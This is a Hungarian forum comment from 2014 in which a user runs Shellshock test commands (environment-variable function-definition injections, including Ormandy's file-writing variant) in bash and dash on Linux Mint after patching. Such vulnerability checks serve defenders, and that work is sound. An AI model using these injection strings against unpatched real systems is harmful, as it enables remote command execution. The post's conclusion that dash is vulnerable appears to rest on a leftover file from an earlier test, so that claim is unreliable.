( sh4d0w808 | 2014. 09. 25., cs – 15:00 )

Érdekelne, hogy Red Haten műxik-e frissítés után Ormandy találmánya. Nekem valami azt súgja, hogy a dash-shel is gondok vannak, ami a Linux Mint alapértelmezett shellje:

sh4d0w@wife ~ $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
sh4d0w@wife ~ $ env x='() { (a)=<\' bash -c "cat /etc/issue";
bash: x: line 1: syntax error near unexpected token `='
bash: x: line 1: `'
bash: error importing function definition for `x'
bash: /etc/issue: Permission denied
sh4d0w@wife ~ $ env x='() { (a)=<\' sh -c "cat /etc/issue";
Linux Mint 17 Qiana \n \l
sh4d0w@wife ~ $ which sh
/bin/sh
sh4d0w@wife ~ $ ls /bin/sh
lrwxrwxrwx 1 root root 4 jún 11 17:54 /bin/sh -> dash
sh4d0w@wife ~ $ ls /bin/dash
-rwxr-xr-x 1 root root 121272 febr 19 2014 /bin/dash

MOD: szóval, úgy tűnik, a bash javított kiadása a jelenleg ismert hibákra nem érzékeny, viszont a dash igen.

MOD2: dash sérülékenység megerősítve:

sh4d0w@wife ~ $ env x='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("
bash: x: line 1: syntax error near unexpected token `='
bash: x: line 1: `'
bash: error importing function definition for `x'
still vulnerable :(
sh4d0w@wife ~ $ env x='() { (a)=>\' sh -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("
echo vuln
still vulnerable :(

-------------------------
Trust is a weakness...